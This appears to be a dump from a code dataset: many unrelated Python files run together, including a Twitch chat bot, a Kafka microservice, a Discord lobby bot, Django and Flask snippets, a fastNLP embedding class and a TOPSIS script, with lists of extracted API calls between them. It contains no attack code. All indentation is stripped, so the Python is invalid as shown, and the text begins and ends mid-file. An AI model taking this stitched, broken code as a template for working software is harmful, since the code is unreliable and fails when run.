firstLine = True
for line in f:
value = long(line)
if firstLine:
base = value
firstLine = False
value = (value - base) / 1000.
wf.write('%s %s delivery 20\n' % (mode, value))
if __name__ == '__main__':
if len(sys.argv) >= 2:
source = sys.argv[1]
else:
source = INPUT_PATH
if len(sys.argv) >= 3:
destination = sys.argv[2]
else:
destination = OUTPUT_PATH
if not os.path.exists(destination):
os.makedirs(destination)
networks = glob.glob('%s/*' % source)
for network in networks:
if not os.path.exists(network.replace(source, destination)):
os.makedirs(network.replace(source, destination))
files = glob.glob('%s/*.pps' % network)
for file in files:
mode = re.findall('(uplink|downlink)', file)[0]
create_oracular_trace(file, file.replace(source, destination).replace('.pps', '.out'), mode)
| [
"os.makedirs",
"os.path.exists",
"re.findall",
"glob.glob"
] | [((991, 1017), 'glob.glob', 'glob.glob', (["('%s/*' % source)"], {}), "('%s/*' % source)\n", (1000, 1017), False, 'import glob\n'), ((909, 936), 'os.path.exists', 'os.path.exists', (['destination'], {}), '(destination)\n', (923, 936), False, 'import os\n'), ((946, 970), 'os.makedirs', 'os.makedirs', (['destination'], {}), '(destination)\n', (957, 970), False, 'import os\n'), ((1217, 1248), 'glob.glob', 'glob.glob', (["('%s/*.pps' % network)"], {}), "('%s/*.pps' % network)\n", (1226, 1248), False, 'import glob\n'), ((1300, 1337), 're.findall', 're.findall', (['"""(uplink|downlink)"""', 'file'], {}), "('(uplink|downlink)', file)\n", (1310, 1337), False, 'import re\n')] |
#!/usr/bin/env python
import sys
import json
import re
import logging
from cli.log import LoggingApp
from pythreatspec import pythreatspec as ts
class UniversalParserApp(LoggingApp):
def parse_file(self, filename):
with open(filename) as fh:
line_no = 1
for line in fh.readlines():
line = line.strip()
self.parser._parse_comment(line, ts.PTSSource(filename, line_no, "universal_parser"))
line_no += 1
def main(self):
self.log.level = logging.INFO
if self.params.out:
outfile = self.params.out
else:
outfile = "{}.threatspec.json".format(self.params.project)
self.parser = ts.PyThreatspecParser()
comments = ['//', '/*', '#', '"""', '\'\'\'']
tags = ['alias','describe','connects','review','mitigates','exposes','transfers','accepts']
self.parser.tag_regex = "^\s*(?:{})*\s*(@(?:{})).*$".format('|'.join([re.escape(c) for c in comments]), '|'.join([re.escape(t) for t in tags]))
for f in self.params.files:
self.log.info("Parsing file {}".format(f))
self.parse_file(f)
reporter = ts.PyThreatspecReporter(self.parser, self.params.project)
from pprint import pprint
self.log.info("Writing output to {}".format(outfile))
with open(outfile, "w") as fh:
json.dump(reporter.export_to_json(), fh, indent=2, separators=(',', ': '))
if __name__ == "__main__":
app = UniversalParserApp(
name="universal.py",
description="ThreatSpec Universal Parser. Parse TreatSpec tags for any language.",
message_format = '%(asctime)s %(levelname)s: %(message)s'
)
app.add_param("-p", "--project", default="default", help="project name (default: default)")
app.add_param("-o", "--out", default=None, help="output file (default: PROJECT.threatspec.json)")
app.add_param("files", action="append", help="source files to parse")
app.run()
| [
"pythreatspec.pythreatspec.PTSSource",
"pythreatspec.pythreatspec.PyThreatspecReporter",
"pythreatspec.pythreatspec.PyThreatspecParser",
"re.escape"
] | [((720, 743), 'pythreatspec.pythreatspec.PyThreatspecParser', 'ts.PyThreatspecParser', ([], {}), '()\n', (741, 743), True, 'from pythreatspec import pythreatspec as ts\n'), ((1193, 1250), 'pythreatspec.pythreatspec.PyThreatspecReporter', 'ts.PyThreatspecReporter', (['self.parser', 'self.params.project'], {}), '(self.parser, self.params.project)\n', (1216, 1250), True, 'from pythreatspec import pythreatspec as ts\n'), ((405, 456), 'pythreatspec.pythreatspec.PTSSource', 'ts.PTSSource', (['filename', 'line_no', '"""universal_parser"""'], {}), "(filename, line_no, 'universal_parser')\n", (417, 456), True, 'from pythreatspec import pythreatspec as ts\n'), ((976, 988), 're.escape', 're.escape', (['c'], {}), '(c)\n', (985, 988), False, 'import re\n'), ((1020, 1032), 're.escape', 're.escape', (['t'], {}), '(t)\n', (1029, 1032), False, 'import re\n')] |
"""
execute a notebook file hierarchy
run_notebooks orig_notebook_dir file_re
run_notebooks autograded "lab_wk9*ipynb"
"""
from pathlib import Path
import click
from .utils import working_directory
import shutil
import nbformat
from nbconvert.preprocessors import ExecutePreprocessor
def run_file(notebook_file, result_file):
print(f"running {notebook_file}")
exec_dir = str(notebook_file.parent)
with open(notebook_file) as f:
nb = nbformat.read(f, as_version=4)
ep = ExecutePreprocessor(timeout=600,allow_errors=True, kernel_name='python3')
ep.preprocess(nb, {'metadata': {'path': exec_dir}})
with open(result_file, 'wt') as f:
nbformat.write(nb, f)
@click.command()
@click.argument('notebook_folder',type=str)
@click.argument('file_re',type=str)
def main(notebook_folder, file_re):
notebook_folder=Path(notebook_folder).resolve()
file_re = f"**/{file_re}"
print(f"starting conversion in {notebook_folder} with {file_re=}")
file_dict = {}
notebook_files = list(notebook_folder.glob(file_re))
print(f"found {len(notebook_files)} files")
for the_notebook in notebook_files:
if str(the_notebook).find("exec") > -1:
print(f"deleting {the_notebook}")
the_notebook.unlink()
continue
print(f"attempting {the_notebook}")
out_file = f"{the_notebook.stem}_exec.ipynb"
out_file = the_notebook.parent / out_file
run_file(the_notebook,out_file)
print(f"through with {out_file}")
if out_file.is_file():
print(f"wrote {out_file=}")
else:
print(f"can't find {out_file}")
| [
"click.argument",
"pathlib.Path",
"nbformat.read",
"nbformat.write",
"nbconvert.preprocessors.ExecutePreprocessor",
"click.command"
] | [((715, 730), 'click.command', 'click.command', ([], {}), '()\n', (728, 730), False, 'import click\n'), ((732, 775), 'click.argument', 'click.argument', (['"""notebook_folder"""'], {'type': 'str'}), "('notebook_folder', type=str)\n", (746, 775), False, 'import click\n'), ((776, 811), 'click.argument', 'click.argument', (['"""file_re"""'], {'type': 'str'}), "('file_re', type=str)\n", (790, 811), False, 'import click\n'), ((457, 487), 'nbformat.read', 'nbformat.read', (['f'], {'as_version': '(4)'}), '(f, as_version=4)\n', (470, 487), False, 'import nbformat\n'), ((501, 575), 'nbconvert.preprocessors.ExecutePreprocessor', 'ExecutePreprocessor', ([], {'timeout': '(600)', 'allow_errors': '(True)', 'kernel_name': '"""python3"""'}), "(timeout=600, allow_errors=True, kernel_name='python3')\n", (520, 575), False, 'from nbconvert.preprocessors import ExecutePreprocessor\n'), ((690, 711), 'nbformat.write', 'nbformat.write', (['nb', 'f'], {}), '(nb, f)\n', (704, 711), False, 'import nbformat\n'), ((867, 888), 'pathlib.Path', 'Path', (['notebook_folder'], {}), '(notebook_folder)\n', (871, 888), False, 'from pathlib import Path\n')] |
"""
Twitch bot
TODO ( Soon™ ):
* Check if user has mod/sub priviliges when using commands
* Fetch moderator-list for channels from Twitch
* Check that the bot actually connects to twitch and the channels on startup
* Move commands.py and blacklist.py to json or something for easier live editing?
* Make it so commands can take arguments
* Allow blacklist to contain regex
"""
import socket
import re
from time import sleep
from commands import commands
from config import config
from blacklist import blacklist
class TwitchBot():
def __init__(self):
self.sock = socket.socket()
def connect(self, channels):
"""Establish a connection with Twitch IRC and connect to channels"""
if config['debug']:
print("Connecting to Twitch")
self.sock.connect((config['host'], config['port']))
self.sock.send(f"PASS {config['oauth_pass']}\r\n".encode("utf-8"))
self.sock.send(f"NICK {config['nick']}\r\n".encode("utf-8"))
for channel in channels:
self.join_channel(channel)
def run(self):
while True:
response = self.sock.recv(1024).decode("utf-8")
self.handle_message(response)
sleep(2) # To prevent getting banned from sending to many messages (20 per 30sec)
def join_channel(self, channel, greeting="/me has joined the channel"):
self.sock.send(f"JOIN #{channel}\r\n".encode("utf-8"))
self.send_message(greeting, channel)
def respond_to_ping(self):
self.sock.send("PONG :tmi.twitch.tv\r\n".encode("utf-8"))
if config['debug']:
print("Pinging server")
def send_message(self, message, channel):
"""Sends a message to a Twitch channel"""
self.sock.send(f"PRIVMSG #{channel} :{message}\r\n".encode("utf-8"))
if config['debug']:
print(f"OUT - {channel}: {message}")
def handle_message(self, message):
"""Decide what to do with a message from server"""
chat_message = re.compile(r"^:\w+!\w+@\w+\.tmi\.twitch\.tv PRIVMSG #\w+ :")
if re.match(chat_message, message): # Message is from a chat
channel = message[1::].split("!")[0]
user = re.search(r'\w+', message).group(0)
message = chat_message.sub("", message)[:-2]
res = self.check_blacklist(message, channel)
if res[0] != -1:
self.timeout_user(channel, user, res[0], res[1])
elif message[0] == "!":
self.handle_commands(message[1::], channel, user)
elif message == "PING :tmi.twitch.tv\r\n":
self.respond_to_ping()
def handle_commands(self, command, channel, username):
"""Execute a command"""
user_auth_level = self.get_user_authority_level(channel, username)
for group in ['global', channel]:
for auth_level in user_auth_level:
if command in commands[group][auth_level]:
self.send_message(commands[group][command], channel)
def get_user_authority_level(self, channel, username):
authority_levels = ['channelowner', 'mod', 'sub', 'all']
if username == channel:
return authority_levels
else:
return authority_levels[3]
def check_blacklist(self, message, channel):
"""Check if part of a message is blacklisted"""
if channel in blacklist:
for phrase in blacklist[channel]:
if phrase in message:
return blacklist[channel][phrase]
return [-1, '']
def timeout_user(self, channel, username, time, timeout_message):
if timeout_message:
self.send_message(timeout_message, channel)
self.send_message(f"/timeout {username} {time}", channel)
if config['debug']:
print(f"Timed out user {username} for {time} seconds.")
if __name__ == "__main__":
bot = TwitchBot()
bot.connect(config['channels'])
bot.run()
| [
"socket.socket",
"re.compile",
"re.match",
"time.sleep",
"re.search"
] | [((632, 647), 'socket.socket', 'socket.socket', ([], {}), '()\n', (645, 647), False, 'import socket\n'), ((2064, 2130), 're.compile', 're.compile', (['"""^:\\\\w+!\\\\w+@\\\\w+\\\\.tmi\\\\.twitch\\\\.tv PRIVMSG #\\\\w+ :"""'], {}), "('^:\\\\w+!\\\\w+@\\\\w+\\\\.tmi\\\\.twitch\\\\.tv PRIVMSG #\\\\w+ :')\n", (2074, 2130), False, 'import re\n'), ((2136, 2167), 're.match', 're.match', (['chat_message', 'message'], {}), '(chat_message, message)\n', (2144, 2167), False, 'import re\n'), ((1261, 1269), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (1266, 1269), False, 'from time import sleep\n'), ((2262, 2288), 're.search', 're.search', (['"""\\\\w+"""', 'message'], {}), "('\\\\w+', message)\n", (2271, 2288), False, 'import re\n')] |
from abc import ABC, abstractmethod
from kafka import KafkaProducer
from kafka import KafkaConsumer
import logging as logger
import json
import os
logger.basicConfig(format='%(asctime)s|[%(levelname)s]|File:%(filename)s|'
'Function:%(funcName)s|Line:%(lineno)s|%(message)s')
default_config = {"KAFKA_SOURCE_BOOTSTRAP_SERVERS": os.environ.get("KAFKA_SOURCE_BOOTSTRAP_SERVERS",
''),
"KAFKA_SOURCE_TOPIC": os.environ.get('KAFKA_SOURCE_TOPIC', ''),
"KAFKA_TARGET_BOOTSTRAP_SERVERS": os.environ.get("KAFKA_TARGET_BOOTSTRAP_SERVERS",
''),
"KAFKA_TARGET_TOPIC": os.environ.get('KAFKA_TARGET_TOPIC', ''),
"MODULE_NAME": os.environ.get('MODULE_NAME', ''),
"CONSUMER_GROUP": os.environ.get("CONSUMER_GROUP", '')}
""" Base Class for pipeline module """
class StreamProcessMicroService(ABC):
@staticmethod
def forgiving_json_deserializer(v):
if v is None:
return
try:
return json.loads(v.decode('utf-8'))
except json.decoder.JSONDecodeError:
logger.error('Unable to decode: %s', v)
return None
def __init__(self, new_config):
self.config = {**default_config, **new_config}
self.verify_env()
logger.info("Connecting to Kafka Consumer bootstrap server")
self.consumer_client = KafkaConsumer(self.config.get("KAFKA_SOURCE_TOPIC"),
group_id=self.config.get("CONSUMER_GROUP"),
bootstrap_servers=self.config.get("KAFKA_SOURCE_BOOTSTRAP_SERVERS").split(
","),
value_deserializer=lambda v: self.forgiving_json_deserializer(v))
logger.info("Connecting to Kafka Producer bootstrap server")
self.producer_client = KafkaProducer(
bootstrap_servers=self.config.get("KAFKA_TARGET_BOOTSTRAP_SERVERS").split(","),
value_serializer=lambda v: json.dumps(v).encode('utf-8'))
self.target_topic = self.config.get("KAFKA_TARGET_TOPIC")
def verify_env(self):
verification_failed = False
for key, value in self.config.items():
if not str.strip(value):
verification_failed = True
logger.error(f"Environment variable '{key}' not set.")
if verification_failed:
quit(1)
def get_producer_client(self):
return self.producer_client
def get_consumer_client(self):
return self.consumer_client
@abstractmethod
def process_message(self, message):
""" Abstract Method. Override this to process the message """
raise NotImplementedError('Implement me in subclass')
def kafka_pipeline_service(self):
""" Skeleton of operations to perform. DON'T override """
print("Starting consumer")
for message in self.consumer_client:
processed_message = self.process_message(message)
if processed_message and type(processed_message) is not tuple:
self.producer_client.send(self.target_topic, processed_message)
elif processed_message and type(processed_message) is tuple and len(processed_message) >= 2:
target_publishing_topic = self.target_topic if processed_message[1] is None else processed_message[1]
self.producer_client.send(target_publishing_topic, processed_message[0])
def start_service(self):
self.kafka_pipeline_service()
| [
"logging.basicConfig",
"json.dumps",
"os.environ.get",
"logging.info",
"logging.error"
] | [((148, 282), 'logging.basicConfig', 'logger.basicConfig', ([], {'format': '"""%(asctime)s|[%(levelname)s]|File:%(filename)s|Function:%(funcName)s|Line:%(lineno)s|%(message)s"""'}), "(format=\n '%(asctime)s|[%(levelname)s]|File:%(filename)s|Function:%(funcName)s|Line:%(lineno)s|%(message)s'\n )\n", (166, 282), True, 'import logging as logger\n'), ((355, 407), 'os.environ.get', 'os.environ.get', (['"""KAFKA_SOURCE_BOOTSTRAP_SERVERS"""', '""""""'], {}), "('KAFKA_SOURCE_BOOTSTRAP_SERVERS', '')\n", (369, 407), False, 'import os\n'), ((516, 556), 'os.environ.get', 'os.environ.get', (['"""KAFKA_SOURCE_TOPIC"""', '""""""'], {}), "('KAFKA_SOURCE_TOPIC', '')\n", (530, 556), False, 'import os\n'), ((610, 662), 'os.environ.get', 'os.environ.get', (['"""KAFKA_TARGET_BOOTSTRAP_SERVERS"""', '""""""'], {}), "('KAFKA_TARGET_BOOTSTRAP_SERVERS', '')\n", (624, 662), False, 'import os\n'), ((771, 811), 'os.environ.get', 'os.environ.get', (['"""KAFKA_TARGET_TOPIC"""', '""""""'], {}), "('KAFKA_TARGET_TOPIC', '')\n", (785, 811), False, 'import os\n'), ((846, 879), 'os.environ.get', 'os.environ.get', (['"""MODULE_NAME"""', '""""""'], {}), "('MODULE_NAME', '')\n", (860, 879), False, 'import os\n'), ((917, 953), 'os.environ.get', 'os.environ.get', (['"""CONSUMER_GROUP"""', '""""""'], {}), "('CONSUMER_GROUP', '')\n", (931, 953), False, 'import os\n'), ((1444, 1504), 'logging.info', 'logger.info', (['"""Connecting to Kafka Consumer bootstrap server"""'], {}), "('Connecting to Kafka Consumer bootstrap server')\n", (1455, 1504), True, 'import logging as logger\n'), ((1972, 2032), 'logging.info', 'logger.info', (['"""Connecting to Kafka Producer bootstrap server"""'], {}), "('Connecting to Kafka Producer bootstrap server')\n", (1983, 2032), True, 'import logging as logger\n'), ((1254, 1293), 'logging.error', 'logger.error', (['"""Unable to decode: %s"""', 'v'], {}), "('Unable to decode: %s', v)\n", (1266, 1293), True, 'import logging as logger\n'), ((2513, 2567), 'logging.error', 'logger.error', (['f"""Environment variable \'{key}\' not set."""'], {}), '(f"Environment variable \'{key}\' not set.")\n', (2525, 2567), True, 'import logging as logger\n'), ((2210, 2223), 'json.dumps', 'json.dumps', (['v'], {}), '(v)\n', (2220, 2223), False, 'import json\n')] |
#!/usr/local/bin/python3
import discord
import asyncio
import core.battle_lobby as battle_lobby
from core.common import SERVSET
CLIENT = discord.Client()
@CLIENT.event
async def on_ready():
print ('Logged in as '+CLIENT.user.name)
await setup_battle_lobby()
@CLIENT.event
async def on_reaction_add(reaction, user):
pass
async def setup_battle_lobby():
@CLIENT.event
async def on_message(message):
if not message.channel.name == 'battle_lobby':
return
if message.content.startswith('//'):
BTLLOB.cmdparse(message)
await message.delete()
else:
if message.author != CLIENT.user:
await message.delete()
G = CLIENT.get_guild(SERVSET['server']['id'])
for category in G.categories:
if category.name == 'Onzozo':
C = category
for chan in C.channels:
if chan.name == 'battle_lobby':
BTLLOBCHAN = chan
BTLLOB = battle_lobby.battle_lobby()
await BTLLOBCHAN.purge()
TOPMSG = await BTLLOBCHAN.send(embed=BTLLOB.top_help_msg())
while True:
STATUS = BTLLOB.get_lobby_status()
async for msg in BTLLOBCHAN.history():
try:
PID = msg.embeds[0].author.name.split(' ')[0]
except (ValueError, IndexError):
pass
if PID not in STATUS.keys():
if not msg.id == TOPMSG.id:
await msg.delete()
elif PID in STATUS.keys():
print (PID)
await msg.edit(embed=STATUS.pop(PID))
for pid, emb in STATUS.items():
await BTLLOBCHAN.send(embed=STATUS[pid])
await asyncio.sleep(2)
def main():
for line in open(SERVSET['tokenfile'], 'r'):
TOKEN = line.rstrip('\n')
CLIENT.run(TOKEN)
if __name__ == '__main__':
main()
| [
"discord.Client",
"core.battle_lobby.battle_lobby",
"asyncio.sleep"
] | [((139, 155), 'discord.Client', 'discord.Client', ([], {}), '()\n', (153, 155), False, 'import discord\n'), ((972, 999), 'core.battle_lobby.battle_lobby', 'battle_lobby.battle_lobby', ([], {}), '()\n', (997, 999), True, 'import core.battle_lobby as battle_lobby\n'), ((1704, 1720), 'asyncio.sleep', 'asyncio.sleep', (['(2)'], {}), '(2)\n', (1717, 1720), False, 'import asyncio\n')] |
"""
Blueprint for hello world.
"""
from flask import Blueprint
from flask_login import login_required
BP = Blueprint('main', __name__)
@BP.route('/')
@BP.route('/index')
@login_required
def index():
"""
Say hello.
:return: A greeting.
:rtype: str
"""
return "Hello, world"
| [
"flask.Blueprint"
] | [((109, 136), 'flask.Blueprint', 'Blueprint', (['"""main"""', '__name__'], {}), "('main', __name__)\n", (118, 136), False, 'from flask import Blueprint\n')] |
# Generated by Django 3.1 on 2021-04-30 18:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('skip', '0011_auto_20210430_1746'),
]
operations = [
migrations.RemoveIndex(
model_name='alert',
name='alert_timestamp_idx',
),
migrations.RenameField(
model_name='alert',
old_name='alert_identifier',
new_name='identifier',
),
migrations.RenameField(
model_name='alert',
old_name='alert_timestamp',
new_name='timestamp',
),
migrations.RenameField(
model_name='event',
old_name='event_identifier',
new_name='identifier',
),
migrations.AddIndex(
model_name='alert',
index=models.Index(fields=['timestamp'], name='timestamp_idx'),
),
]
| [
"django.db.migrations.RemoveIndex",
"django.db.models.Index",
"django.db.migrations.RenameField"
] | [((230, 300), 'django.db.migrations.RemoveIndex', 'migrations.RemoveIndex', ([], {'model_name': '"""alert"""', 'name': '"""alert_timestamp_idx"""'}), "(model_name='alert', name='alert_timestamp_idx')\n", (252, 300), False, 'from django.db import migrations, models\n'), ((345, 443), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""alert"""', 'old_name': '"""alert_identifier"""', 'new_name': '"""identifier"""'}), "(model_name='alert', old_name='alert_identifier',\n new_name='identifier')\n", (367, 443), False, 'from django.db import migrations, models\n'), ((496, 592), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""alert"""', 'old_name': '"""alert_timestamp"""', 'new_name': '"""timestamp"""'}), "(model_name='alert', old_name='alert_timestamp',\n new_name='timestamp')\n", (518, 592), False, 'from django.db import migrations, models\n'), ((645, 743), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""event"""', 'old_name': '"""event_identifier"""', 'new_name': '"""identifier"""'}), "(model_name='event', old_name='event_identifier',\n new_name='identifier')\n", (667, 743), False, 'from django.db import migrations, models\n'), ((867, 923), 'django.db.models.Index', 'models.Index', ([], {'fields': "['timestamp']", 'name': '"""timestamp_idx"""'}), "(fields=['timestamp'], name='timestamp_idx')\n", (879, 923), False, 'from django.db import migrations, models\n')] |
import math
import random
class BatchIterCANTM:
def __init__(self, dataIter, batch_size=32, filling_last_batch=False, postProcessor=None):
self.dataIter = dataIter
self.batch_size = batch_size
self.num_batches = self._get_num_batches()
self.filling_last_batch = filling_last_batch
self.postProcessor = postProcessor
self.fillter = []
self._reset_iter()
def _get_num_batches(self):
num_batches = math.ceil(len(self.dataIter)/self.batch_size)
return num_batches
def _reset_iter(self):
self.current_batch_idx = 0
def __iter__(self):
self._reset_iter()
return self
def __next__(self):
if self.current_batch_idx < self.num_batches:
current_batch = self._readNextBatch()
self.current_batch_idx += 1
if self.postProcessor:
return self.postProcessor(current_batch)
else:
return current_batch
else:
self._reset_iter()
raise StopIteration
def __len__(self):
return self.num_batches
def _readNextBatch(self):
i = 0
batch_dict = {}
while i < self.batch_size:
try:
each_item_dict = next(self.dataIter)
if self.filling_last_batch:
self._update_fillter(each_item_dict)
for reader_item_key in each_item_dict:
if reader_item_key in batch_dict:
batch_dict[reader_item_key].append(each_item_dict[reader_item_key])
else:
batch_dict[reader_item_key] = [each_item_dict[reader_item_key]]
i+=1
except StopIteration:
if self.filling_last_batch:
batch_dict = self._filling_last_batch(batch_dict, i)
i = self.batch_size
return batch_dict
def _filling_last_batch(self, batch_dict, num_current_batch):
num_filling = self.batch_size - num_current_batch
random.shuffle(self.fillter)
for filler_id in range(num_filling):
each_item_dict = self.fillter[filler_id]
for reader_item_key in each_item_dict:
if reader_item_key in batch_dict:
batch_dict[reader_item_key].append(each_item_dict[reader_item_key])
else:
batch_dict[reader_item_key] = [each_item_dict[reader_item_key]]
return batch_dict
def _update_fillter(self, each_item_dict):
r = random.random()
if len(self.fillter) < self.batch_size:
self.fillter.append(each_item_dict)
elif r>0.9:
self.fillter.pop(0)
self.fillter.append(each_item_dict)
| [
"random.random",
"random.shuffle"
] | [((2085, 2113), 'random.shuffle', 'random.shuffle', (['self.fillter'], {}), '(self.fillter)\n', (2099, 2113), False, 'import random\n'), ((2593, 2608), 'random.random', 'random.random', ([], {}), '()\n', (2606, 2608), False, 'import random\n')] |
from importlib import import_module
from django.conf import settings
from django.conf.urls import include, url
from django.core.exceptions import ImproperlyConfigured
from tastypie.api import Api
from .api import TemporaryFileResource, ServiceResource, VariableResource
from .views import TemporaryFileUploadFormView, TemporaryFileUploadUrlView, TemporaryFileDownloadView
DEFAULT_INSTALLED_INTERFACES = (
'ncdjango.interfaces.data',
'ncdjango.interfaces.arcgis_extended',
'ncdjango.interfaces.arcgis'
)
INSTALLED_INTERFACES = getattr(settings, 'NC_INSTALLED_INTERFACES', DEFAULT_INSTALLED_INTERFACES)
app_name = 'ncdjango'
urlpatterns = []
for interface in INSTALLED_INTERFACES:
try:
module = import_module("{}.urls".format(interface))
except (ImportError, TypeError):
raise ImproperlyConfigured("Can't find ncdjango interface: {}".format(interface))
try:
urlpatterns += getattr(module, 'urlpatterns')
except AttributeError:
raise ImproperlyConfigured("Interface URLs file has no urlpatterns")
api = Api(api_name="admin")
api.register(TemporaryFileResource())
api.register(ServiceResource())
api.register(VariableResource())
urlpatterns += [
url(r'^api/admin/upload-by-url/$', TemporaryFileUploadUrlView.as_view(), name='nc_admin_upload_by_url'),
url(r'^api/admin/upload/$', TemporaryFileUploadFormView.as_view(), name='nc_admin_upload'),
url(r'^api/admin/download/(?P<uuid>[0-9\w\-]+)/$', TemporaryFileDownloadView.as_view(), name='nc_admin_download'),
url(r'^api/', include(api.urls)),
url(r'^geoprocessing/', include('ncdjango.geoprocessing.urls'))
]
| [
"django.conf.urls.include",
"django.core.exceptions.ImproperlyConfigured",
"tastypie.api.Api"
] | [((1068, 1089), 'tastypie.api.Api', 'Api', ([], {'api_name': '"""admin"""'}), "(api_name='admin')\n", (1071, 1089), False, 'from tastypie.api import Api\n'), ((1553, 1570), 'django.conf.urls.include', 'include', (['api.urls'], {}), '(api.urls)\n', (1560, 1570), False, 'from django.conf.urls import include, url\n'), ((1601, 1639), 'django.conf.urls.include', 'include', (['"""ncdjango.geoprocessing.urls"""'], {}), "('ncdjango.geoprocessing.urls')\n", (1608, 1639), False, 'from django.conf.urls import include, url\n'), ((998, 1060), 'django.core.exceptions.ImproperlyConfigured', 'ImproperlyConfigured', (['"""Interface URLs file has no urlpatterns"""'], {}), "('Interface URLs file has no urlpatterns')\n", (1018, 1060), False, 'from django.core.exceptions import ImproperlyConfigured\n')] |
__all__ = [
"Embedding"
]
import torch.nn as nn
from ..utils import get_embeddings
class Embedding(nn.Embedding):
"""
别名::class:`fastNLP.modules.Embedding` :class:`fastNLP.modules.encoder.embedding.Embedding`
Embedding组件. 可以通过self.num_embeddings获取词表大小; self.embedding_dim获取embedding的维度"""
def __init__(self, init_embed, padding_idx=None, dropout=0.0, sparse=False, max_norm=None, norm_type=2,
scale_grad_by_freq=False):
"""
:param tuple(int,int),torch.FloatTensor,nn.Embedding,numpy.ndarray init_embed: Embedding的大小(传入tuple(int, int),
第一个int为vocab_zie, 第二个int为embed_dim); 如果为Tensor, Embedding, ndarray等则直接使用该值初始化Embedding
:param None,int padding_idx: 该index的Embedding将一直为0.
:param float dropout: 对Embedding的输出的dropout。
:param bool sparse: 如果为True,则对Embedding的梯度将是sparse的,参考Pytorch Embedding获取更多信息。
:param None,float max_norm: 每个vector最大的norm能为多大
:param int norm_type: norm的类型
:param bool scale_grad_by_freq: 如果为True,将会把梯度除以这个词出现的次数.
"""
embed = get_embeddings(init_embed)
num_embeddings, embedding_dim = embed.weight.size()
super().__init__(num_embeddings, embedding_dim, padding_idx=padding_idx,
max_norm=max_norm, norm_type=norm_type, scale_grad_by_freq=scale_grad_by_freq,
sparse=sparse, _weight=embed.weight.data)
del embed
self.dropout = nn.Dropout(dropout)
def forward(self, x):
"""
:param torch.LongTensor x: [batch, seq_len]
:return: torch.Tensor : [batch, seq_len, embed_dim]
"""
x = super().forward(x)
return self.dropout(x)
def size(self):
"""
Embedding的大小
:return: torch.Size()
"""
return self.weight.size()
| [
"torch.nn.Dropout"
] | [((1483, 1502), 'torch.nn.Dropout', 'nn.Dropout', (['dropout'], {}), '(dropout)\n', (1493, 1502), True, 'import torch.nn as nn\n')] |
import base64
import io
from matplotlib import pyplot
import numpy as np
import rasterio
def read_raster_file(input_fn, band = 1):
with rasterio.open(input_fn) as src:
return src.read(band)
def plot_raster_layer(input_fn, band = 1, from_logits = True):
pyplot.figure(figsize = (10,10))
data = read_raster_file(input_fn, band)
if from_logits:
data = np.exp(data)
pyplot.imshow(data, cmap='viridis')
pyplot.show()
def plot_histogram(input_fn, band = 1, from_logits = True):
pyplot.figure(figsize = (10,10))
data = read_raster_file(input_fn, band)
pyplot.hist(np.rint(data), bins='auto')
pyplot.show()
def get_base64_image(input_fn, band = 1, from_logits = True):
pyplot.figure(figsize = (10,10))
data = read_raster_file(input_fn, band)
pyplot.imshow(data, cmap='viridis')
pic_IObytes = io.BytesIO()
pyplot.savefig(pic_IObytes, format='png')
pic_IObytes.seek(0)
pic_hash = base64.b64encode(pic_IObytes.read())
# We need to remove the quotation and b character
pic_hash = str(pic_hash)[2:-1]
pyplot.close()
return pic_hash
| [
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.savefig",
"rasterio.open",
"io.BytesIO",
"matplotlib.pyplot.close",
"numpy.exp",
"matplotlib.pyplot.figure",
"numpy.rint",
"matplotlib.pyplot.show"
] | [((278, 309), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (291, 309), False, 'from matplotlib import pyplot\n'), ((407, 442), 'matplotlib.pyplot.imshow', 'pyplot.imshow', (['data'], {'cmap': '"""viridis"""'}), "(data, cmap='viridis')\n", (420, 442), False, 'from matplotlib import pyplot\n'), ((447, 460), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (458, 460), False, 'from matplotlib import pyplot\n'), ((531, 562), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (544, 562), False, 'from matplotlib import pyplot\n'), ((657, 670), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (668, 670), False, 'from matplotlib import pyplot\n'), ((739, 770), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (752, 770), False, 'from matplotlib import pyplot\n'), ((820, 855), 'matplotlib.pyplot.imshow', 'pyplot.imshow', (['data'], {'cmap': '"""viridis"""'}), "(data, cmap='viridis')\n", (833, 855), False, 'from matplotlib import pyplot\n'), ((875, 887), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (885, 887), False, 'import io\n'), ((892, 933), 'matplotlib.pyplot.savefig', 'pyplot.savefig', (['pic_IObytes'], {'format': '"""png"""'}), "(pic_IObytes, format='png')\n", (906, 933), False, 'from matplotlib import pyplot\n'), ((1104, 1118), 'matplotlib.pyplot.close', 'pyplot.close', ([], {}), '()\n', (1116, 1118), False, 'from matplotlib import pyplot\n'), ((143, 166), 'rasterio.open', 'rasterio.open', (['input_fn'], {}), '(input_fn)\n', (156, 166), False, 'import rasterio\n'), ((390, 402), 'numpy.exp', 'np.exp', (['data'], {}), '(data)\n', (396, 402), True, 'import numpy as np\n'), ((624, 637), 'numpy.rint', 'np.rint', (['data'], {}), '(data)\n', (631, 637), True, 'import numpy as np\n')] |
def main():
import pandas as pd
import sys
if len(sys.argv) != 5:
sys.exit("Error: Incorrect Number of arguments\nDesired Syntax: topsis <inputDataFile> <weights> <impacts> <outputFileName>")
try:
df = pd.read_csv(sys.argv[1])
except:
sys.exit("Error: File not Found! Make sure the file is saved in the current working directory.")
if len(df.columns) < 3:
sys.exit("Error: Input file must contain three or more columns")
if df.shape[1] != df.select_dtypes(include=["float", 'int']).shape[1]+1:
sys.exit("Error: From 2nd to last columns must contain numeric values only")
if df.isnull().sum().sum() != 0:
sys.exit("Error: Input file contains NULL values!")
try:
weights = list(map(float, sys.argv[2].split(',')))
except ValueError:
sys.exit("Error: Weights must be numeric only")
if len(weights) != len(df.columns)-1:
sys.exit(
